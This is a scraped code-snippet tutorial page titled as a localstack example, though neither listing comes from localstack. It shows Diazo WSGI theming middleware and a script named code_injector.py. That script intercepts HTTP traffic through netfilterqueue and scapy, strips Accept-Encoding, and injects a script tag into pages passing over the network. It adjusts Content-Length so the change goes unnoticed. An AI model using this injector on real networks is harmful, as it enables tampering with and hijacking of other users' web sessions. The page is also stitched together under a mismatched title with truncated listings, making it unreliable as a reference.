How to use the update_content_length method in localstack

Best Python code snippet using localstack_python

wsgi.py

Source:wsgi.py Github

copy

Full Screen

import os.path
import re

import pkg_resources
from diazo.compiler import compile_theme
from diazo.utils import quote_param
from lxml import etree, html
from repoze.xmliter.serializer import XMLSerializer
from repoze.xmliter.utils import getHTMLSerializer
from webob import Request

try:
    string_types = basestring  # Python 2
except NameError:
    string_types = str  # Python 3

# Request/response header that switches the transformation off when truthy.
DIAZO_OFF_HEADER = 'X-Diazo-Off'


def asbool(value):
    """Coerce ``value`` to a bool.

    Strings are stripped, lower-cased and matched against a fixed set of
    true/false spellings; any other string raises ``ValueError``.
    Non-string values are passed through ``bool()``.
    """
    if isinstance(value, string_types):
        value = value.strip().lower()
        if value in ('true', 'yes', 'on', 'y', 't', '1',):
            return True
        elif value in ('false', 'no', 'off', 'n', 'f', '0'):
            return False
        else:
            raise ValueError("String is not true/false: %r" % value)
    else:
        return bool(value)


class FilesystemResolver(etree.Resolver):
    """Resolver for filesystem paths
    """

    def resolve(self, system_url, public_id, context):
        # Only plain paths (no URL scheme) that exist on disk are handled;
        # returning None lets the next registered resolver try.
        if '://' not in system_url and os.path.exists(system_url):
            return self.resolve_filename(system_url, context)
        else:
            return None


class NetworkResolver(etree.Resolver):
    """Resolver for network urls
    """

    def resolve(self, system_url, public_id, context):
        # 'file:///__diazo__' is explicitly excluded from resolution here.
        if '://' in system_url and system_url != 'file:///__diazo__':
            return self.resolve_filename(system_url, context)
        else:
            return None


class PythonResolver(etree.Resolver):
    """Resolver for python:// urls
    """

    def resolve(self, system_url, public_id, context):
        if not system_url.lower().startswith('python://'):
            return None

        # Strip the 9-character 'python://' prefix, leaving
        # '<package>/<resource path>'.
        spec = system_url[9:]
        package, resource_name = spec.split('/', 1)
        filename = pkg_resources.resource_filename(package, resource_name)

        return self.resolve_filename(filename, context)


class WSGIResolver(etree.Resolver):
    """Resolver that performs a WSGI subrequest
    """

    def __init__(self, app):
        self.app = app

    def resolve(self, system_url, public_id, context):
        # Ignore URLs with a scheme
        if '://' in system_url:
            return None

        # Ignore the special 'diazo:' resolvers
        if system_url.startswith('diazo:'):
            return None

        subrequest = Request.blank(system_url)
        response = subrequest.get_response(self.app)

        # Only a 200 response is used; anything else is left unresolved.
        status_code = response.status.split()[0]
        if not status_code == '200':
            return None

        return self.resolve_string(response.body, context)


class XSLTMiddleware(object):
    """Apply XSLT in middleware
    """

    def __init__(self, app, global_conf,
                 filename=None, tree=None,
                 read_network=False,
                 update_content_length=True,
                 ignored_extensions=(
                     'js', 'css', 'gif', 'jpg', 'jpeg', 'pdf', 'ps', 'doc',
                     'png', 'ico', 'mov', 'mpg', 'mpeg', 'mp3', 'm4a', 'txt',
                     'rtf', 'swf', 'wav', 'zip', 'wmv', 'ppt', 'gz', 'tgz',
                     'jar', 'xls', 'bmp', 'tif', 'tga', 'hqx', 'avi',
                 ),
                 environ_param_map=None,
                 **params
                 ):
        """Initialise, giving a filename or parsed XSLT tree.

        The parameters are:

        * ``filename``, a filename from which to read the XSLT file
        * ``tree``, a pre-parsed lxml tree representing the XSLT file

        ``filename`` and ``tree`` are mutually exclusive.

        * ``read_network``, should be set to True to allow resolving resources
          from the network.
        * ``update_content_length``, can be set to False to avoid calculating
          an updated Content-Length header when applying the transformation.
          This is only a good idea if some middleware higher up the chain
          is going to set the content length instead.
        * ``ignored_extensions`` can be set to a list of filename extensions
          for which the transformation should never be applied
        * ``environ_param_map`` can be set to a dict of environ keys to
          parameter names. The corresponding values will then be sent to the
          transformation as parameters.

        Additional keyword arguments will be passed to the transformation as
        parameters.
        """

        self.app = app
        self.global_conf = global_conf

        if filename is not None:
            # The context manager closes the file even if read() raises.
            with open(filename) as xslt_file:
                source = xslt_file.read()
            tree = etree.fromstring(source)

        self.read_network = asbool(read_network)
        # Pass the normalised boolean: a raw config string such as "false"
        # is truthy and would otherwise enable network access.
        self.access_control = etree.XSLTAccessControl(
            read_file=True, write_file=False, create_dir=False,
            read_network=self.read_network, write_network=False)
        self.transform = etree.XSLT(tree, access_control=self.access_control)
        self.update_content_length = asbool(update_content_length)
        self.ignored_extensions = ignored_extensions

        self.ignored_pattern = re.compile(
            r"^.*\.(%s)$" % '|'.join(ignored_extensions))

        self.environ_param_map = environ_param_map or {}
        self.params = params

    def __call__(self, environ, start_response):
        """WSGI entry point: run the wrapped app and transform its output."""
        request = Request(environ)
        response = request.get_response(self.app)

        # NOTE(review): start_response is invoked here, before the headers
        # are modified further down - confirm those later header changes
        # still reach the client with the WSGI server in use.
        app_iter = response(environ, start_response)

        if self.should_ignore(request) or not self.should_transform(response):
            return app_iter

        # Set up parameters

        params = {}
        for key, value in self.environ_param_map.items():
            if key in environ:
                params[value] = quote_param(environ[key])
        for key, value in self.params.items():
            params[key] = quote_param(value)

        # Apply the transformation
        app_iter = getHTMLSerializer(app_iter)
        tree = self.transform(app_iter.tree, **params)

        # Set content type and choose XHTML or HTML serializer
        serializer = html.tostring
        response.headers['Content-Type'] = 'text/html'

        if tree.docinfo.doctype and 'XHTML' in tree.docinfo.doctype:
            serializer = etree.tostring
            response.headers['Content-Type'] = 'application/xhtml+xml'

        app_iter = XMLSerializer(tree, serializer=serializer)

        # Calculate the content length - we still return the parsed tree
        # so that other middleware could avoid having to re-parse, even if
        # we take a hit on serialising here
        if self.update_content_length and 'Content-Length' in response.headers:
            response.headers['Content-Length'] = str(len(str(app_iter)))

        # Return a repoze.xmliter XMLSerializer, which helps avoid re-parsing
        # the content tree in later middleware stages
        return app_iter

    def should_ignore(self, request):
        """Determine if we should ignore the request
        """

        if asbool(request.headers.get(DIAZO_OFF_HEADER, 'no')):
            return True

        path = request.path_info
        if self.ignored_pattern.search(path) is not None:
            return True

        return False

    def should_transform(self, response):
        """Determine if we should transform the response
        """

        if asbool(response.headers.get(DIAZO_OFF_HEADER, 'no')):
            return False

        content_type = response.headers.get('Content-Type')
        if not content_type or not content_type.lower().startswith(
                ('text/html', 'application/xhtml+xml')):
            return False

        # Compressed bodies cannot be parsed as HTML. 'gzip'/'x-gzip' are
        # the registered names of the common coding; 'zip' is kept for
        # backward compatibility.
        content_encoding = response.headers.get('Content-Encoding')
        if content_encoding in (
                'zip', 'gzip', 'x-gzip', 'deflate', 'compress',):
            return False

        # Redirects, 204 and 401 responses are passed through untouched.
        status_code = response.status.split()[0]
        if (status_code.startswith('3')
                or status_code == '204'
                or status_code == '401'):
            return False

        return True


class DiazoMiddleware(object):
    """Invoke the Diazo transform as middleware
    """

    def __init__(self, app, global_conf, rules,
                 theme=None,
                 prefix=None,
                 includemode='document',
                 debug=False,
                 read_network=False,
                 update_content_length=True,
                 ignored_extensions=(
                     'js', 'css', 'gif', 'jpg', 'jpeg', 'pdf', 'ps', 'doc',
                     'png', 'ico', 'mov', 'mpg', 'mpeg', 'mp3', 'm4a', 'txt',
                     'rtf', 'swf', 'wav', 'zip', 'wmv', 'ppt', 'gz', 'tgz',
                     'jar', 'xls', 'bmp', 'tif', 'tga', 'hqx', 'avi',
                 ),
                 environ_param_map=None,
                 **params
                 ):
        """Create the middleware. The parameters are:

        * ``rules``, the rules file
        * ``theme``, a URL to the theme file (may be a file:// URL)
        * ``debug``, set to True to recompile the theme on each request
        * ``prefix`` can be set to a string that will be prefixed to
          any *relative* URL referenced in an image, link or stylesheet in the
          theme HTML file before the theme is passed to the compiler. This
          allows a theme to be written so that it can be opened and viewed
          standalone on the filesystem, even if at runtime its static
          resources are going to be served from some other location. For
          example, an ``<img src="images/foo.jpg" />`` can be turned into
          ``<img src="/static/images/foo.jpg" />`` with a ``prefix`` of
          "/static".
        * ``includemode`` can be set to 'document', 'esi' or 'ssi' to change
          the way in which includes are processed
        * ``read_network``, should be set to True to allow resolving resources
          from the network.
        * ``update_content_length``, can be set to False to avoid calculating
          an updated Content-Length header when applying the transformation.
          This is only a good idea if some middleware higher up the chain
          is going to set the content length instead.
        * ``ignored_extensions`` can be set to a list of filename extensions
          for which the transformation should never be applied
        * ``environ_param_map`` can be set to a dict of environ keys to
          parameter names; the ``diazo.path``, ``diazo.host`` and
          ``diazo.scheme`` keys are always added to it.

        Additional keyword arguments will be passed to the theme
        transformation as parameters.
        """

        self.app = app
        self.global_conf = global_conf

        self.rules = rules
        self.theme = theme
        self.absolute_prefix = prefix
        self.includemode = includemode
        self.debug = asbool(debug)
        self.read_network = asbool(read_network)
        self.update_content_length = asbool(update_content_length)
        self.ignored_extensions = ignored_extensions

        # Use the normalised boolean so that a string such as "false" does
        # not accidentally enable network access.
        self.access_control = etree.XSLTAccessControl(
            read_file=True, write_file=False, create_dir=False,
            read_network=self.read_network, write_network=False)
        self.transform_middleware = None

        # Work on a copy so the caller's dict is not mutated by update().
        self.environ_param_map = dict(environ_param_map or {})
        self.environ_param_map.update({
            'diazo.path': 'path',
            'diazo.host': 'host',
            'diazo.scheme': 'scheme',
        })

        self.params = params.copy()

    def compile_theme(self):
        """Compile the Diazo theme, returning an lxml tree (containing an XSLT
        document)
        """

        # FilesystemResolver defines no constructor arguments and never
        # reads an app, so none is passed.
        filesystem_resolver = FilesystemResolver()
        wsgi_resolver = WSGIResolver(self.app)
        python_resolver = PythonResolver()
        network_resolver = NetworkResolver()

        rules_parser = etree.XMLParser(recover=False)
        rules_parser.resolvers.add(filesystem_resolver)
        rules_parser.resolvers.add(wsgi_resolver)
        rules_parser.resolvers.add(python_resolver)
        if self.read_network:
            rules_parser.resolvers.add(network_resolver)

        theme_parser = etree.HTMLParser()
        theme_parser.resolvers.add(filesystem_resolver)
        theme_parser.resolvers.add(wsgi_resolver)
        theme_parser.resolvers.add(python_resolver)
        if self.read_network:
            theme_parser.resolvers.add(network_resolver)

        # Every environ-derived parameter name is passed to the compiler,
        # with None as a placeholder when no explicit value was given.
        xsl_params = self.params.copy()
        for value in self.environ_param_map.values():
            if value not in xsl_params:
                xsl_params[value] = None

        # Inside this method the bare name refers to the module-level
        # ``compile_theme`` imported from diazo.compiler.
        return compile_theme(self.rules,
                             theme=self.theme,
                             absolute_prefix=self.absolute_prefix,
                             includemode=self.includemode,
                             access_control=self.access_control,
                             read_network=self.read_network,
                             parser=theme_parser,
                             rules_parser=rules_parser,
                             xsl_params=xsl_params,
                             )

    def get_transform_middleware(self):
        """Build an ``XSLTMiddleware`` around a freshly compiled theme."""
        return XSLTMiddleware(self.app, self.global_conf,
                              tree=self.compile_theme(),
                              read_network=self.read_network,
                              update_content_length=self.update_content_length,
                              ignored_extensions=self.ignored_extensions,
                              environ_param_map=self.environ_param_map,
                              **self.params
                              )

    def __call__(self, environ, start_response):
        # The compiled middleware is cached on the instance unless debug
        # mode is on, in which case the theme is recompiled per request.
        transform_middleware = self.transform_middleware
        if transform_middleware is None or self.debug:
            transform_middleware = self.get_transform_middleware()
        if transform_middleware is not None and not self.debug:
            self.transform_middleware = transform_middleware

        # Set up variables, some of which are used as transform parameters
        request = Request(environ)

        environ['diazo.rules'] = self.rules
        environ['diazo.absolute_prefix'] = self.absolute_prefix
        environ['diazo.path'] = request.path
        environ['diazo.host'] = request.host
        # The scheme parameter must carry the URL scheme, not the host.
        environ['diazo.scheme'] = request.scheme

        # The source listing is truncated at this point; the remainder of
        # this method is not shown.
        ...

Full Screen

Full Screen

code_injector.py

Source:code_injector.py Github

copy

Full Screen

#!/usr/bin/env python
import re

import netfilterqueue
from scapy.packet import Raw
from scapy.layers.inet import IP, TCP

# Defined but not referenced anywhere in the visible code.
redirect = b"HTTP/1.1 301 Moved Permanently\nLocation: https://arxiv.org/pdf/2105.14943.pdf\n\n"
payload = b"<script>alert('h4ck3d');</script>\n"


def set_load(packet, load):
    """Store ``load`` as the packet's Raw payload and return the packet.

    The IP length and the IP/TCP checksum fields are deleted from the
    packet after the payload is replaced.
    """
    # print(packet.show())
    packet[Raw].load = load
    # NOTE(review): presumably scapy recomputes these deleted fields when
    # the packet is serialised - confirm against the scapy documentation.
    del packet[IP].len
    del packet[IP].chksum
    del packet[TCP].chksum
    return packet


def process_packet(packet):
    """Queue callback: rewrite HTTP payloads on port 80, then accept.

    Requests (destination port 80) have their Accept-Encoding header
    removed. Responses (source port 80) have ``payload`` inserted before
    the closing body tag and, for text/html, the Content-Length value
    increased by ``len(payload)``.
    """
    ip_packet = IP(packet.get_payload())

    # Packets without both a Raw and a TCP layer are passed on untouched.
    if not (ip_packet.haslayer(Raw) and ip_packet.haslayer(TCP)):
        packet.accept()
        return

    original_load = ip_packet[Raw].load
    load = original_load
    tcp_layer = ip_packet[TCP]

    if tcp_layer.dport == 80:
        print("[+] HTTP Request")
        load = re.sub(rb"Accept-Encoding:.*?\r\n", b"", load)
        # print(scapy_packet.show())
    elif tcp_layer.sport == 80:
        print("[+] HTTP Response")
        # NOTE: the replacement text ends in "</body" without the closing
        # ">", exactly as in the original listing.
        load = load.replace(b"</body>", payload + b"</body")
        length_match = re.search(rb"(Content-Length:\s)(\d*)", load)
        if length_match and b"text/html" in load:
            content_length = length_match.group(2)
            update_content_length = int(content_length.decode()) + len(payload)
            print(f'Before: {content_length} ; After: {update_content_length}')
            # Replaces every occurrence of the old digits in the load.
            load = load.replace(
                content_length, str(update_content_length).encode())
        # print(scapy_packet.show())

    if load != original_load:
        rebuilt = set_load(ip_packet, load)
        packet.set_payload(bytes(rebuilt))

    packet.accept()


def main():
    """Bind ``process_packet`` to netfilter queue 0 and run the queue."""
    queue = netfilterqueue.NetfilterQueue()
    queue.bind(0, process_packet)
    queue.run()


if __name__ == "__main__":
    # The body of this guard is truncated in the source listing.
    ...

Full Screen

Full Screen

Automation Testing Tutorials

Learn to execute automation testing from scratch with LambdaTest Learning Hub, right from setting up the prerequisites and running your first automation test to following best practices and diving deeper into advanced test scenarios. LambdaTest Learning Hubs compile step-by-step guides to help you become proficient with different test automation frameworks, e.g. Selenium, Cypress, and TestNG.

LambdaTest Learning Hubs:

YouTube

You can also refer to the video tutorials on the LambdaTest YouTube channel for step-by-step demonstrations from industry experts.

Run localstack automation tests on LambdaTest cloud grid

Perform automation testing on 3000+ real desktop and mobile devices online.

Try LambdaTest Now !!

Get 100 automation test minutes FREE!!

Next-Gen App & Browser Testing Cloud

Was this article helpful?

Helpful

Not Helpful